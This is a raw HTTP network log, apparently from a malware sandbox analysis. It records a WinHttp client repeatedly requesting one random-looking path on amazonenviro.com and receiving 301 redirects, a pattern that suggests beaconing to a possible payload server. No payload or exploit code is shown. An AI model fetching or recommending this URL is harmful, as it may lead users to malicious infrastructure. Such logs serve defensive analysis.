                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:40.635659933 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:40.946182013 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:40 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:42.569226980 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:42.879467964 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:42 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:44.521003008 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:45.715809107 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:45.716080904 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:45.716178894 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:47.317533970 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:47.627629042 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:47 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:49.255390882 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:49.572283983 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:49 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:51.216979027 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:51.527559996 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:51 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:53.148093939 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:53.458235025 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:53 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:55.102166891 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:55.412390947 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:55 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:57.076934099 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:57.387269974 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:57 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:24:59.019017935 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:24:59.329560995 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:24:59 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:00.949740887 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:01.260628939 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:01 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:02.953073978 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:03.281265974 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:03 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:04.962333918 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:05.274292946 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:05 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:06.911449909 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:07.222122908 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:07 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:08.835870981 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:09.146507978 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:10.752278090 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:11.062268019 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:10 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:12.729248047 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:13.039334059 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:12 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:14.698240042 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:15.008749008 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:14 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:16.684869051 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:16.995081902 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:16 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:18.587634087 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:18.898366928 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:18 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:20.549110889 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:20.859464884 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:20 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:22.496917009 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:22.807887077 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:22 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:24.433629036 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:24.744117022 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:24 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:26.360616922 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:26.671545982 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:26 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:28.279562950 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:28.590183973 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:28 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:30.223527908 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:30.536135912 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:30 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:32.234637022 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:32.554723978 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:32 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:34.181060076 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:34.491100073 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:34 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:36.078697920 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:36.389172077 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:36 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:37.977544069 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:38.288398027 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:38 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:39.946317911 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:40.257287025 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:40 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:41.866827011 CET 165 OUT GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:42.177628040 CET 500 IN HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:42 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
